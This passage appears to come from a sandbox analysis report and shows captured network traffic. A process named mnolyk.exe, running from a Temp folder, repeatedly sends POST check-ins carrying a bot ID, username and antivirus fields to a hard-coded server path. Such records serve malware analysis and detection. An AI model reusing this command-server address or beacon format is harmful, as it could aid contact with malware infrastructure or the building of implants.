                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:23.197545052 CET414INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.74969762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:01.357866049 CET11OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:01.422851086 CET25INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:01 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      30192.168.2.74972462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:08.827018976 CET134OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:08.890192986 CET134INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      300192.168.2.74999562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:23.383016109 CET415OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:23.447137117 CET415INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      301192.168.2.74999662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:23.620454073 CET416OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:23.682626009 CET416INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      302192.168.2.74999762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:23.882400990 CET417OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:23.947484970 CET417INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      303192.168.2.74999862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:24.116920948 CET418OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:24.179281950 CET418INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      304192.168.2.74999962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:24.351918936 CET419OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:24.415993929 CET419INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      305192.168.2.75000062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:24.592011929 CET420OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:24.655093908 CET420INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      306192.168.2.75000162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:24.834270000 CET421OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:24.897998095 CET421INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      307192.168.2.75000262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:25.080418110 CET422OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:25.143611908 CET422INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      308192.168.2.75000362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:25.325124979 CET423OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:25.388860941 CET423INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      309192.168.2.75000462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:25.569822073 CET424OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:25.633472919 CET424INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      31192.168.2.74972562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:09.061494112 CET135OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.126104116 CET135INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      310192.168.2.75000562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:25.803186893 CET425OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:25.864747047 CET425INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      311192.168.2.75000662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:26.061961889 CET426OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.126768112 CET426INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      312192.168.2.75000762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:26.308602095 CET427OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.372323036 CET427INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      313192.168.2.75000862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:26.555660009 CET428OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.619647980 CET428INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      314192.168.2.75000962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:26.787936926 CET429OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:26.851175070 CET429INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      315192.168.2.75001062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:27.035129070 CET430OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:27.101217031 CET430INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
